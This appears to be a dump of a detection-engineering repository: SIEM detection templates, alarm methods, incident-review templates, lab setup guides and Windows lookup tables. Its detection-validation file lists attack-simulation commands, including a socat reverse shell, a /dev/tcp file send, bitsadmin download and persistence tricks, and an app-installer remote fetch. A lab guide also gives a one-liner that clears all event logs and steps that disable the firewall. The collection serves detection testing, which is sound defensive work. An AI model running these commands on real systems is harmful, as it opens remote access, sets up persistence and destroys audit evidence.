```
├── .gitignore
├── Detect.ods
├── Detection-Library-Structure.md
├── Detection-Methods.md
├── Detection-Tactics.md
├── Documentation-Templates
│   ├── After-Action-Review.md
│   ├── Incident-Response-Plan.md
│   ├── Incident-Response-Policy.md
│   └── System-and-Information-Integrity-Policy.md
├── LICENSE
├── Lab
│   ├── WindowsVictim.md
│   ├── detection_validation.md
│   ├── helk.md
│   ├── pfSense.md
│   └── sysmonlabconfig.xml
├── Logging.md
├── Lookups
│   ├── o365-principalappid.csv
│   ├── windows-logon-type.csv
│   └── windows-status-code.csv
├── Metrics.md
├── Notable-Event-IDs.md
├── Orientation
│   └── crown-jewels.md
├── README.md
├── Signatures
│   └── Splunk
│       ├── panorama-config-change-spike.md
│       ├── panorama-config-change-unknown-user.md
│       ├── panorama-failed-logon-spike.md
│       ├── panorama-large-transfer.md
│       ├── panorama-src_ip-dest_port-spike.md
│       ├── panorama-src_ip-distinct-dest_ip-spike.md
│       ├── panorama-src_ip-unknown-dest_ip-spike.md
│       ├── panorama-suspicious-dest_port.md
│       ├── panorama-threat-detected.md
│       ├── panorama-unkown-app-protocol.md
│       ├── sourcetype-outage-dynamic.md
│       └── splunk-general.md
├── Splunk
│   └── apps
│       └── Splunk_TA_paloalto
│           └── local
│               └── props.conf
├── Tactics
│   ├── API-Usage.md
│   ├── Account-Creation.md
│   ├── Account-Logon.md
│   ├── Account-Modification.md
│   ├── Application-Log.md
│   ├── Commandline-Activity.md
│   ├── Configuration-Change.md
│   ├── DNS-Request.md
│   ├── Email-Traffic.md
│   ├── File-Access.md
│   ├── File-Content.md
│   ├── File-Creation.md
│   ├── File-Deletion.md
│   ├── File-Modification.md
│   ├── File-Rename.md
│   ├── Group-Access.md
│   ├── Group-Creation.md
│   ├── Group-Deletion.md
│   ├── Group-Modifcation.md
│   ├── Group-Rename.md
│   ├── Instance-Creation.md
│   ├── Instance-Deletion.md
│   ├── Instance-Modification.md
│   ├── Instance-Start.md
│   ├── Instance-Stop.md
│   ├── Log-Clearing.md
│   ├── Module-Load.md
│   ├── NGAV-Alarms.md
│   ├── Network-Activity-by-Flow.md
│   ├── Network-Activity-by-IP.md
│   ├── Network-Activity-by-Process.md
│   ├── Network-Full-Packet-Capture.md
│   ├── Process-Access.md
│   ├── Process-Execution.md
│   ├── Registry-Creation.md
│   ├── Registry-Modification.md
│   ├── Resource-Consumption.md
│   ├── Scheduled-Task-Creation.md
│   ├── Service-Creation.md
│   ├── Service-Modification.md
│   ├── Web-Request.md
│   └── Web-Server.md
├── Threat-Hunting.md
├── Use-Case-Structure.md
├── Use-Cases.md
├── UseCases
│   ├── Detect-Password-Spraying-via-Windows-Events.md
│   ├── Layer3-Firewall.md
│   └── Layer7-Firewall.md
├── attack-tools-resources.md
├── dashboards.md
├── field-kit.md
├── hardening
│   ├── dns-security.md
│   ├── email-security.md
│   ├── general-security.md
│   ├── microsoft-365-auditing-and-reporting.md
│   ├── microsoft-365-azure-ad.md
│   ├── microsoft-365-exchange.md
│   ├── microsoft-365-sharepoint-and-onedrive.md
│   ├── microsoft-365-teams.md
│   ├── microsoft-active-directory.md
│   ├── microsoft-windows-dns.md
│   ├── microsoft-windows.md
│   ├── network.md
│   ├── remote-access.md
│   ├── software-manufacturers.md
│   └── web-security.md
├── incident-tracking.md
├── interview-questions.md
├── mitigation-categories.md
├── osintel.md
├── response-tools-resources.md
├── sigma
│   ├── Copy-SplunkSigma-Sysmon1-to-4688.ps1
│   ├── adoption.md
│   ├── filters
│   │   ├── test_filter1.yml
│   │   └── test_filter2.yml
│   ├── output
│   │   └── savedsearches.conf
│   ├── pipelines
│   │   ├── cloudtrail.yml
│   │   ├── linux_builtin.yml
│   │   ├── webserver_generic.yml
│   │   ├── windows.yml
│   │   ├── windows_sysmon.yml
│   │   └── windows_xml.yml
│   └── sigma-splunk-library.md
└── technical-documentation.md
```

--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
```
*.tmp
.~lock.Detect.ods#
.vscode/settings.json
.vscode/launch.json
```

--------------------------------------------------------------------------------
/Detect.ods:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TonyPhipps/SIEM/dacbe207f7788822f14c78ca380d20690eed7f0c/Detect.ods

--------------------------------------------------------------------------------
/Detection-Library-Structure.md:
--------------------------------------------------------------------------------
- [Executive Summary](#executive-summary)
  - [Name](#name)
  - [Problem Statement](#problem-statement)
  - [Objectives](#objectives)
  - [Compliance](#compliance)
  - [MITRE ATT&CK Framework](#mitre-attck-framework)
  - [Assumptions and Limitations](#assumptions-and-limitations)
- [Analysis](#analysis)
  - [Monitoring and Notifications](#monitoring-and-notifications)
  - [Recommended Response Action(s)](#recommended-response-actions)
- [Engineering](#engineering)
  - [Component Names](#component-names)
    - [Alert [Name]](#alert-name)
    - [Query [Name]](#query-name)
  - [Data Stream Analysis](#data-stream-analysis)
  - [Validation](#validation)
    - [Attack Simulation](#attack-simulation)
  - [References and Resources](#references-and-resources)


# Executive Summary

Primarily focused on providing high-level information, references, and background.


## Name

A succinct statement that describes the detection (e.g. Detect Communication with a Known-Bad IP).


## Compliance

List the applicable compliance frameworks and the specific components this Detection relates to.


## MITRE ATT&CK Framework

List the applicable MITRE ATT&CK Framework Tactics/Techniques this Detection relates to.

## Assumptions and Limitations

Describes any assumptions or limitations regarding law, licensing, policies, or technicalities.


# Analysis

Insight on the actions of, and tools for, those who are expected to monitor and respond.


## Monitoring and Notifications

Describes how the detection will bring attention to itself. This typically involves monitors, dashboards, reports, emails, alerts, etc.


## Recommended Use Case / Playbook(s)

Describes which playbook(s) should be followed when handling the detection.


# Engineering

The necessary steps and content construction that fulfill the Detection. If the Detection and all its components were lost, this section should allow complete reconstruction.


## Component Names

The base components that provide business logic, display, and notification.
- Include the expected makeup of the source log and an example.
- Use a word like "Suspicious" to indicate that the fidelity is lower and therefore some false positives may result.
- Group alerts/queries into a single use case when they share common objectives/recommended response actions.


### Alert [Name]

- Filter
- Grouping
- Severity
- Threshold
  - Event Count
  - Time Window
- Category/Normalization
- Tags
- Fidelity (high means no false positives)


### Query [Name]

- Query String
- Fidelity (high means no false positives)
- Query Explanation


## Validation

Methods to ensure the Detection was developed and is operating properly. These can be pass/fail, time based, or other relevant measurements. When possible, include an automated script or manual steps to cause the alert to fire on demand (i.e. attack simulation).


### Attack Simulation

Specific actions to reproduce events that are expected to be detected/highlighted by use case components.


## References and Resources
Any useful resources or references that can help understand the vulnerability, attack, detection logic, affected software, protocols, etc.

--------------------------------------------------------------------------------
/Detection-Methods.md:
--------------------------------------------------------------------------------
# Alarms

## Match Alarm
- An Alarm is generated for each match.

## Threshold Alarm
- Build a watchlist with one or more fields
- For each matching event, add a record to the watchlist
- For each record changed, count the total number of matching records
- Alarm when the count exceeds the specified threshold
- Watchlist records are removed based on time since creation

## Blacklist Alarm
- Manually add records to a watchlist of one or more fields
- For each matching event, compare to existing records
- Alarm if the matching event matches all the fields of any record

## Whitelist Alarm
- Manually add records to a watchlist of one or more fields
- For each matching event, compare to existing records
- Alarm if the matching event does NOT match all the fields of any record

## Rolling Whitelist Alarm

(AKA sliding window)

- Build a watchlist with one or more fields, including a counter field
- For each matching event, add a record to the watchlist or increment the counter of the matching record
- Alarm when a new entry is observed (counter value == 1)
- Alarm when a counter exceeds a specified threshold
- Watchlist entries are removed based on the age of their last-edited time

## Deviation from Baseline Alarm
- Build a watchlist with one or more fields, including a numeric 'baseline' field
- For each matching event, add a record to the watchlist and calculate the average of all records' baseline value
- Matching events have their selected numeric field compared with the average baseline value
- Alarm if the percentage difference between the matched event and the baseline average exceeds a set value or percentage
- Watchlist records are removed based on time since creation

## Time of Day Alarm
- Build a watchlist of one or more fields, including a start time of day and an end time of day
- For each matching event, determine whether the event time falls between the matching record's start time of day and end time of day
- Alarm if the event time is not within the start and stop times

## Day of Week Alarm
- Build a watchlist of one or more fields, including one for each day of the week
- For each matching event, determine whether the matching record's field for that day of the week is FALSE
- Alarm if the matching record's day-of-week field is FALSE

## Group of Alarms
- For a matching alarm event, store it in a watchlist
- For the next matching alarm event, compare to the watchlist for matches in one or more properties
- Alarm if a match is found

## Levenshtein Score Alarm

(AKA Edit Distance; AKA Similarity Score)

https://en.wikipedia.org/wiki/Levenshtein_distance

A score of 0 means both strings are equal.

- Build a watchlist of words to match against
- For each matching event, calculate the Levenshtein score of the selected field value against each entry in the watchlist
- Alarm if any score falls below a given threshold

## Shannon Entropy Score Alarm

(AKA Frequency Score; AKA randomness score)

https://en.wikipedia.org/wiki/Entropy_(information_theory)

A higher score means the string has a higher level of randomness.

- For each matching event, calculate the Shannon Entropy Score of the selected field value
- Alarm if the score exceeds a given threshold (unlike the Levenshtein alarm, a high score is the suspicious case here)

In other words: calculate the randomness of strings and Alarm when the score exceeds a given threshold.


## Alarm Controls

### Mute
- Silence identical alarms for X time period

### Aggregation
- Group identical alarms when X or more fire in Y time period

# Visualizations

## Aggregate Count

(AKA Stack Count; AKA Long Tail Analysis)

Also known as stacking or least frequency of occurrence analysis (LFO), this method counts the number of occurrences of each unique value and sorts them in ascending order. The values with the lowest counts are considered outliers. In some cases this can be reversed, with the values with the highest counts considered the outliers, but this is relatively rare.

## Z-score

When dealing with numeric values, a statistical test such as the z-score can be used. This test looks for values that lie more than a chosen number of standard deviations away from the mean. Typically, this threshold is two or three standard deviations.

--------------------------------------------------------------------------------
/Documentation-Templates/After-Action-Review.md:
--------------------------------------------------------------------------------
## After Action Review and Reporting
After-Action Reports (AARs) are created during and after After-Action Review meetings to identify successes, failures, and lessons learned. These reports also serve to track the assignment and execution of any changes that may be warranted as a result of lessons learned.

AARs shall include:
- Unique Ticket ID Number
- Incident Summary
- All fields from the ticket
- Activities to Sustain
- Opportunities to Improve
- Action Items and the individual assigned to each

Action items shall be tracked until completion. Completed AARs shall be stored in the ticket as an attachment.


### AAR Fundamentals
- Conducted during or immediately after each event
- Focused on intent, objectives and standards
- Focus is on team member, manager, and company performance
- Involves all participants in the discussion
- Uses open-ended questions
- Encourages initiative and innovation in finding more effective ways to achieve standards and meet objectives and intent
- Determines strengths and weaknesses
- Links performance to subsequent training


### AAR Agenda


#### Introduction
- **Everyone must participate** if they have an insight, observation, or question which will help the team identify and correct deficiencies or sustain strengths. The AAR is a dynamic, candid, professional discussion of training that focuses on team performance measured against the task standards.
- **The AAR is not a critique.** No one, regardless of rank, position, or strength of personality, has all of the information or answers. AARs maximize training benefits by allowing members to learn from each other.
- **The AAR does not evaluate success or failure.** There are always weaknesses to improve and strengths to sustain.
- Reinforce the fact that it is permissible to disagree respectfully.
- Focus on learning and encourage people to give honest opinions.
- Use open-ended and leading questions to guide the discussion of member, manager, and team performance.
- Enter the discussion only when necessary.


#### Review What Was Supposed to Happen
The facilitator, along with the participants, reviews what was supposed to happen. This review is based on the intent, objectives and standards. This information is usually found in the IR Policy, Plan and related documentation.

- State the objectives and standards
- Review Opposition Forces (OPFOR) if used, including their mission and purpose
- Review company mission, intent and concept of operations


#### Review What Did Happen
The facilitator and participants determine what actually occurred during the incident. The leader attempts to gather as many views or perspectives (OPFOR, manager, analyst, engineer, etc.) as feasible. This helps to establish a common understanding of the operation/event. Leaders then understand the complexity of an event and work to solve complex, ill-defined problems quickly.

- Review actions before first detection
- Review report of first detection or contact
- Review reaction to detection or contact
- Review events during engagement


#### Review What Went Right and Wrong
Participants are to establish the strong and weak points of their performance based on the original intent and performance measures. The facilitator guides discussions to ensure maximum input that is operationally sound and relevant to the incident.

- Review the extent to which objectives were met
- Review the extent to which the intent was met
- Have participants summarize the major learning points
- Identify training deficiencies
- Identify the team's ability to perform the task and meet the intent
- Identify safety risks and the measures employed to mitigate them


#### Determine How the Event or Task Should Be Done Next Time
The facilitator guides the unit in self-determining how the task(s) might be performed more effectively in the future. The unit identifies problems and provides solutions, and identifies who is responsible for making the recommended changes. Additionally, the facilitator guides the discussion to determine if there is a more effective way to train the tasks to achieve the commander's intent.

- Identify if retraining should occur
- Identify the condition(s) to modify
- Identify which task(s) to retrain to meet the intent
- Identify a more effective way to meet the intent


## AAR Resources
- https://www.nwcg.gov/sites/default/files/wfldp/docs/army-leaders-guide-to-aar.pdf

--------------------------------------------------------------------------------
/Lab/WindowsVictim.md:
--------------------------------------------------------------------------------
In order to build a lab for Windows logs, a Windows system is required. The content on this page will focus on setting up a victim system with advanced logging. While production systems may not have such high levels of logging, it remains important to understand how attacks and activities can be logged. It may be the case that observations in a lab environment warrant increasing logging on production systems to allow detection.

- [Windows Configuration](#windows-configuration)
  - [Disable Windows Firewall](#disable-windows-firewall)
  - [Disable Password Protected Sharing](#disable-password-protected-sharing)
  - [PowerShell Logging](#powershell-logging)
  - [Increase Log Size](#increase-log-size)
  - [Enable Process Creation (Event ID 4688)](#enable-process-creation-event-id-4688)
  - [Enable Task History](#enable-task-history)
- [Sysmon](#sysmon)
- [WinLogBeat](#winlogbeat)
- [Other Useful Tidbits](#other-useful-tidbits)
  - [Clear all the Logs](#clear-all-the-logs)

# Windows Configuration

## Disable Windows Firewall
Windows Security > Firewall & Network Protection > Private Network > Turn Off

## Disable Password Protected Sharing

- Control Panel > Network and Internet > Network and Sharing Center > Advanced Sharing Settings > All Networks > ...
  - Public Folder Sharing > Turn on...
  - Password Protected Sharing > Turn off...

## PowerShell Logging
- %SystemRoot%\system32\winevt\logs\Microsoft-Windows-PowerShell%4Operational.evtx

### Enable ScriptBlock Logging
(Event ID 4104)
- Create the key path: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
- Create new DWORD values
  - EnableScriptBlockLogging = 1
  - EnableScriptBlockInvocationLogging = 1
- Event ID 4104 will populate the Microsoft-Windows-PowerShell/Operational log

-OR-

- gpedit.msc
- Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell
  - Turn On Script Block Logging: Enabled
  - Log Stop/Start Events: Checked

### Enable Module Logging
- Create the key path: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging
- Create new DWORD EnableModuleLogging = 1
- Create the key path: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames
- Create new STRING VALUE `*` = `*` (an asterisk for both the value name and the data)

-OR-

- gpedit.msc
- Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell
  - Turn On Module Logging: Enabled
  - Module Name: *

Event ID 4103 will populate the Microsoft-Windows-PowerShell/Operational log

### Transcription
- Create the key path: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\Transcription\
- Create new DWORD EnableInvocationHeader = 1
- Create new DWORD EnableTranscripting = 1
- Create new STRING VALUE OutputDirectory = <directory for transcripts>
- Logs will be stored in .txt files in the specified directory, using the format `..\YYYYMMDD\PowerShell_transcript.PCNAME.RANDOM.YYYYMMDDHHMMSS.txt`

-OR-

- gpedit.msc
- Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell
  - Turn On PowerShell Transcription: Enabled
  - Log Stop/Start Events: Checked

## Increase Log Size
- Event Viewer > Application and Service Logs > Microsoft > Windows > PowerShell > Operational
- Event Viewer > Application and Service Logs > Microsoft > Windows > Sysmon > Operational
- Right Click > Properties
  - Maximum Log Size ( KB ): 100,032 or higher is recommended

## Enable Process Creation (Event ID 4688)
- Secpol.exe
- Advanced Audit Policy Configuration > System Audit Policies > Detailed Tracking
  - Audit Process Creation: Enabled, Success

### Include Command Line in 4688 Events
- gpedit.msc
- Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options
  - Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings: Enabled
- Computer Configuration > Administrative Templates > System > Audit Process Creation
  - Include command line in process creation events: Enabled

## Enable Task History
- Task Scheduler
- Click Enable All Tasks History

# Sysmon
- Copy Sysmon to the virtual host and install it as a service
  - c:\windows\sysmon\sysmon64.exe -accepteula -i [sysmonlabconfig.xml](/Lab/sysmonlabconfig.xml)
- %SystemRoot%\system32\winevt\logs\Microsoft-Windows-Sysmon%4Operational.evtx

# WinLogBeat
- https://www.elastic.co/downloads/beats/winlogbeat
- Configure WinLogBeat by editing winlogbeat.yml
  - Recommended starter config: https://raw.githubusercontent.com/Cyb3rWard0g/HELK/master/winlogbeat/winlogbeat.yml
  - Ensure the `hosts:` section of the config file has the correct destination IP
- Install via install-service-winlogbeat.ps1, then start via `Start-Service winlogbeat`


### Break SleepStudy
Sometimes this odd service will begin creating an endless loop of .etl files. This command breaks that "feature," since there is no proper option to disable it.
```
Set-ItemProperty -Path C:\Windows\System32\SleepStudy\*.etl -Name IsReadOnly -Value $true
```

# Other Useful Tidbits

## Clear all the Logs
`wevtutil el | Foreach-Object {wevtutil cl "$_"}`

--------------------------------------------------------------------------------
/Lab/detection_validation.md:
--------------------------------------------------------------------------------
# AppInstaller.exe T1105
```
start ms-appinstaller://?source=https://127.0.0.1/bad.txt
```

# Aspnet_Compiler.exe T1127
```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\asptest\ -f C:\asptest\none -u
```

# at.exe T1053.002
```
C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\calc.exe
```

# Atbroker.exe T1218
```
C:\Windows\System32\Atbroker.exe /start calc.exe
C:\Windows\SysWOW64\Atbroker.exe /start calc.exe
```

# Bash.exe T1202
```
C:\Windows\System32\bash.exe -c calc.exe
C:\Windows\System32\bash.exe -c "socat tcp-connect:127.0.0.1:80 exec:sh,pty,stderr,setsid,sigint,sane"
C:\Windows\System32\bash.exe -c 'cat calc.exe > /dev/tcp/127.0.0.1/24'
```

# Bitsadmin.exe T1564.004
```
C:\Windows\System32\bitsadmin.exe /create myfile
C:\Windows\System32\bitsadmin.exe /addfile myfile c:\windows\system32\notepad.exe c:\notepad.exe
C:\Windows\System32\bitsadmin.exe /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL
C:\Windows\System32\bitsadmin.exe /RESUME myfile
```

# Bitsadmin.exe T1105
```
C:\Windows\System32\bitsadmin.exe /create 1
C:\Windows\System32\bitsadmin.exe /addfile 1 https://live.sysinternals.com/autoruns.exe c:\autoruns.exe
C:\Windows\System32\bitsadmin.exe /RESUME 1
C:\Windows\System32\bitsadmin.exe /complete 1
```

# Bitsadmin.exe T1105
```
C:\Windows\System32\bitsadmin.exe /create 1
C:\Windows\System32\bitsadmin.exe /addfile 1 c:\windows\system32\cmd.exe c:\cmd.exe
C:\Windows\System32\bitsadmin.exe /RESUME 1
C:\Windows\System32\bitsadmin.exe /Complete 1
C:\Windows\System32\bitsadmin.exe /reset
```

# Bitsadmin.exe T1218
```
C:\Windows\System32\bitsadmin.exe /create 1
C:\Windows\System32\bitsadmin.exe /addfile 1 c:\windows\system32\cmd.exe c:\cmd.exe
C:\Windows\System32\bitsadmin.exe /SetNotifyCmdLine 1 c:\cmd.exe NULL
C:\Windows\System32\bitsadmin.exe /RESUME 1
C:\Windows\System32\bitsadmin.exe /Reset
```

# Resources
https://lolbas-project.github.io/#

--------------------------------------------------------------------------------
/Lab/helk.md:
--------------------------------------------------------------------------------
# Quick Setup Guide for HELK

https://github.com/Cyb3rWard0g/HELK

- Create an Ubuntu-based VM
- `sudo apt install git`
- `git clone https://github.com/Cyb3rWard0g/HELK`
- `cd HELK/docker/`
- `sudo ./helk_install.sh`
  - Optionally tail the install log in a second terminal via `tail -f /var/log/helk-install.log`
- Select Build number 1

--------------------------------------------------------------------------------
/Lab/pfSense.md:
--------------------------------------------------------------------------------
Running malware in a lab environment demands some sort of firewall protection, which pfSense provides well and cheaply.

# Virtualization Recommended Settings
- 1GB Memory
- 1 Virtual processor
- 4GB Hard drive
- Provide two network interfaces: one joined to a Private Network, one joined to the External Network (if you wish to connect to the real world)


# Installation
- Literally accepting every default is fine and fast.


# Initial Setup
- Assign WAN to the interface tied to the External Network (use the MAC to verify, or unplug the interface)
- Assign LAN to the interface tied to the Private Network (use the MAC to verify, or unplug the interface)
- You may need to assign a static IP to the LAN interface (option 2), like 192.168.2.1
  - When asked if you want to enable DHCP, say Yes
  - When asked if you want to revert to HTTP as the webConfigurator protocol, say No.
- Now you can use the virtual hosts on the internal network to access the web interface via the LAN IP.
  - Default username: admin
  - Default password: pfsense
- Using the web interface, navigate to Services > DHCP Server and provide DNS servers
  - 1.1.1.1
  - 9.9.9.9
  - 8.8.8.8
- Navigate to Advanced > Admin Access
  - Ensure Protocol is set to HTTPS
  - Ensure SSH is enabled

# Suricata Setup
- Install the Suricata package at System > Package Manager
- Services > Suricata
  - Global Settings
    - Enable "Install ETOpen Emerging Threats rules"
    - Enable "Install Snort GPLv2 Community rules"
    - Set update interval to 1 day
    - Enable "Live Rule Swap on Update"
  - Updates
    - Click Update to perform an update

--------------------------------------------------------------------------------
/Logging.md:
--------------------------------------------------------------------------------
# Log Priority

The following is a prioritized list of recommended event logs to collect into your SIEM (ordering should be customized per organization and is subject to change here).

- Security Product Logs (EDR/AV/HIPS/IPS)
- Windows DC Event Logs / LDAP Logs
- Web Proxy Requests
- PowerShell Logs
- DNS Queries (with endpoint name/IP)
- Firewall (Egress Only)
- VPN Logs
- Google Cloud Logging
- AWS CloudWatch
- Microsoft M365 UnifiedAuditLog
- Microsoft AzureAD Sign-In Logs
- Microsoft Cloud App Security Logs
- Microsoft AzureAD Identity Protection
- Microsoft M365 Defender for Identity
- Linux osquery Logs
- Windows Member Server Event Logs
- Windows Workstation Event Logs
- Linux auditd Logs
- Email Logs
- Custom Application Logs
- Firewall
- DHCP
- Netflow
- AWS VPC Flow Logs
- Google VPC Flow Logs
- Microsoft Network Security Group Flow Logs
- Full packet capture


The priority here takes into consideration
- Data ingestion/space restrictions
- Common attack vectors
- Common detection sources
- Expected noise levels
- Overall aid to investigations
- Legal precedent on what adequate security monitoring includes


# Requirements
- Normalize all field names and content. This is critical to success in correlation and to analyst faith in their search results.
- Parse out nested fields. Looking at you, Microsoft Event Log "Message" field.
- All event logs should be set to ISO 8601 UTC. This may require transforms to convert from the original device's local time.
- All devices should sync with Network Time Protocol (NTP) providers.


# Considerations
- What is the system performance impact of log collection on an endpoint?
- What is the system performance impact of log collection on network appliances?
- How long should data be held in "hot" (searchable) storage?
- How long is data to be held in "cold" (backup) storage?
- How much storage space is needed?
- Is there an enforceable logging policy in place?
- What is the expected event load on the server, and what is the appropriate amount of hardware resources to handle the load?
- How will event log feeds be monitored for issues/outages?
- What is the maximum allowable travel time from when an event occurs to when the log reaches the centralized logging server?


# Event Reduction

Reduction of ingested events to only those with a security concern is highly recommended. This may require a separate 'data lake' from logs maintained for regulatory compliance. Reduced logs save money and analyst time, and improve system performance.

Common tune-outs at the ingest level include
- Authorized vulnerability scanners
- Debug logs
- Encrypted data
- File access by backup service accounts
- Common application errors
- Health Checks

Some logs can be significantly reduced by eliminating one or more fields, such as the multi-paragraph descriptions that Windows Event Logs often include in the log.

Logs that do not provide basic security context should be considered for tuning out. Basic security context means:
- Date and Time of Action
- Source System/Account Attribution
- Description of Action
- Description of Target (when applicable)
- Description of Outcome (sometimes implied)

Note: This does not imply that non-security focused logs are of no value/use.

## Detection Layering
This approach allows a high-level understanding of interactions between log collection, detections, and monitoring.

- Detection can (and should) occur at any tier.
- "Tuning" based on content analysis and feedback should be used on every tier.

Tiers
- Raw Events
  - Monitoring for visible anomalies in a stream of events.
  - Are the logs needed?
  - Can we filter some events?
  - Are the appropriate fields collected?
  - Are the fields parsed correctly?

- Aggregation of Raw Events (usually via widgets on dashboards)
  - Stack counting of one or more fields helps surface interesting events
  - Which fields do you aggregate?
  - When should information roll over/expire?
  - Styles
    - Aggregation counts
    - First occurrence
    - Last occurrence
    - Frequency bar chart enabling long tail analysis

- Prioritized Alerts
  - When confirmed incidents are found, an opportunity to create a prioritized alert is presented.
  - What is the criticality of the asset?
    - People
    - Services
    - Devices
    - Data
    - Tiers within assets
    - Interaction between assets
  - What is the fidelity of the technique?
    - Blacklist Alert
    - Whitelist
    - Count Threshold
    - Newly Observed
    - Etc.

- Incidents
  - A Prioritized Alert of highest severity requires acknowledgement.
  - Known-Bad
    - Vendor Signature
    - IP
    - Domain
    - Etc.
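As an added example (not code from this library), the following Python applies the ingest tune-outs from Event Reduction to a constructed batch of normalized events, drops events lacking basic security context, strips a bulky field, and then performs the first aggregation tier from Detection Layering (stack count with first/last occurrence and a long-tail view). Field names, tune-out values and the sample events are assumptions.

```python
"""Ingest-time event reduction and first-tier aggregation.

Added example, not code from the SIEM repository. Field names, tune-out values
and the sample events are constructed for illustration.
"""
from collections import Counter

# Basic security context: time, source attribution, action (target/outcome may be implied).
REQUIRED_CONTEXT = ("time", "src_user", "action")

# Constructed tune-out values; populate these from your own environment.
AUTHORIZED_SCANNERS = {"10.0.0.50"}
BACKUP_SERVICE_ACCOUNTS = {"svc_backup"}
HEALTH_CHECK_PATHS = {"/healthz", "/ping"}
BULKY_FIELDS = ("message",)  # e.g. the multi-paragraph Windows "Message" field


def tune_out_reason(ev):
    """Return why an event should be dropped at ingest, or None to keep it."""
    if ev.get("src_ip") in AUTHORIZED_SCANNERS:
        return "authorized scanner"
    if ev.get("level") == "DEBUG":
        return "debug log"
    if ev.get("action") == "file_access" and ev.get("src_user") in BACKUP_SERVICE_ACCOUNTS:
        return "backup service account file access"
    if ev.get("uri") in HEALTH_CHECK_PATHS:
        return "health check"
    missing = [f for f in REQUIRED_CONTEXT if not ev.get(f)]
    if missing:
        return "missing context: " + ",".join(missing)
    return None


def strip_fields(ev, fields=BULKY_FIELDS):
    """Reduce event size by removing fields that add bytes but no security context."""
    return {k: v for k, v in ev.items() if k not in fields}


def reduce_events(events):
    """Split a batch into kept (slimmed) events and a count of drop reasons."""
    kept, dropped = [], Counter()
    for ev in events:
        reason = tune_out_reason(ev)
        if reason:
            dropped[reason] += 1
        else:
            kept.append(strip_fields(ev))
    return kept, dropped


def stack_count(events, key):
    """Aggregation tier: count plus first and last occurrence per value of key."""
    agg = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        value = ev.get(key)
        if value is None:
            continue
        entry = agg.setdefault(value, {"count": 0, "first_seen": ev["time"], "last_seen": ev["time"]})
        entry["count"] += 1
        entry["last_seen"] = ev["time"]
    return agg


def long_tail(agg, max_count=1):
    """The rare end of the frequency chart: values seen at most max_count times."""
    return sorted(v for v, a in agg.items() if a["count"] <= max_count)


# Constructed, already-normalized events (ISO 8601 UTC timestamps, as Logging.md requires).
SAMPLE_EVENTS = [
    {"time": "2024-05-01T08:00:00Z", "src_ip": "10.0.0.50", "src_user": "svc_scan", "action": "logon"},
    {"time": "2024-05-01T08:01:00Z", "src_ip": "10.0.0.7", "src_user": "alice", "action": "logon",
     "outcome": "success", "message": "An account was successfully logged on... (long text)"},
    {"time": "2024-05-01T08:02:00Z", "src_ip": "10.0.0.7", "src_user": "alice", "action": "process_create", "image": "cmd.exe"},
    {"time": "2024-05-01T08:03:00Z", "src_ip": "10.0.0.8", "src_user": "svc_backup", "action": "file_access", "path": "\\\\fs\\share\\a.docx"},
    {"time": "2024-05-01T08:04:00Z", "src_ip": "10.0.0.9", "src_user": "app", "action": "trace", "level": "DEBUG"},
    {"time": "2024-05-01T08:05:00Z", "src_ip": "10.0.0.10", "src_user": "lb-probe", "action": "web_request", "uri": "/healthz"},
    {"time": "2024-05-01T08:06:00Z", "src_ip": "10.0.0.11", "action": "logon"},
    {"time": "2024-05-01T08:07:00Z", "src_ip": "10.0.0.12", "src_user": "bob", "action": "process_create", "image": "certutil.exe"},
    {"time": "2024-05-01T08:08:00Z", "src_ip": "10.0.0.7", "src_user": "alice", "action": "process_create", "image": "cmd.exe"},
]

if __name__ == "__main__":
    kept, dropped = reduce_events(SAMPLE_EVENTS)
    print(f"kept {len(kept)} of {len(SAMPLE_EVENTS)}; dropped: {dict(dropped)}")
    by_image = stack_count(kept, "image")
    print("stack count by image:", by_image)
    print("long tail:", long_tail(by_image))
```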


# Log Setup

## PowerShell Transcription
https://devblogs.microsoft.com/powershell/powershell-the-blue-team/

- Set up PowerShell Transcription logging via GPO at
  - Windows Components -> Administrative Templates -> Windows PowerShell
  - Turn On PowerShell Transcription: ON
  - Set Transcript output directory to the \\server\transcripts share path
  - Check Include Invocation Headers

## Windows Event Forwarding and Collector
https://docs.microsoft.com/en-us/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection
https://docs.microsoft.com/en-us/windows/win32/wec/windows-event-collector
https://medium.com/palantir/windows-event-forwarding-for-network-defense-cb208d5ff86f
https://hackernoon.com/the-windows-event-forwarding-survival-guide-2010db7a68c4
http://zenshaze.com/wp/?p=57

- Set WEC timezone to UTC / GMT
- Set up GPO Computer Configuration → Policies → Administrative Templates → Windows Components → Event Forwarding → Configure Target Subscription Manager
- Set up subscriptions
--------------------------------------------------------------------------------
/Lookups/windows-logon-type.csv:
--------------------------------------------------------------------------------
"Logon Type","Description"
"2","Interactive"
"3","Network"
"4","Batch"
"5","Service"
"7","Unlock"
"8","NetworkCleartext"
"9","NewCredentials"
"10","RemoteInteractive"
"11","CachedInteractive"
--------------------------------------------------------------------------------
/Lookups/windows-status-code.csv:
--------------------------------------------------------------------------------
"Status Code","Description"
"0xC0000064","user name does not exist"
"0xC000006A","user name is correct but the password is wrong"
"0xC0000234","user is currently locked out"
"0xC0000072","account is currently disabled"
"0xC000006F","user tried to logon outside his day of week or time of day restrictions"
"0xC0000070","workstation restriction, or Authentication Policy Silo violation (look for event ID 4820 on domain controller)"
"0xC0000193","account expiration"
"0xC0000071","expired password"
"0xC0000133","clocks between DC and other computer too far out of sync"
"0xC0000224","user is required to change password at next logon"
"0xC0000225","evidently a bug in Windows and not a risk"
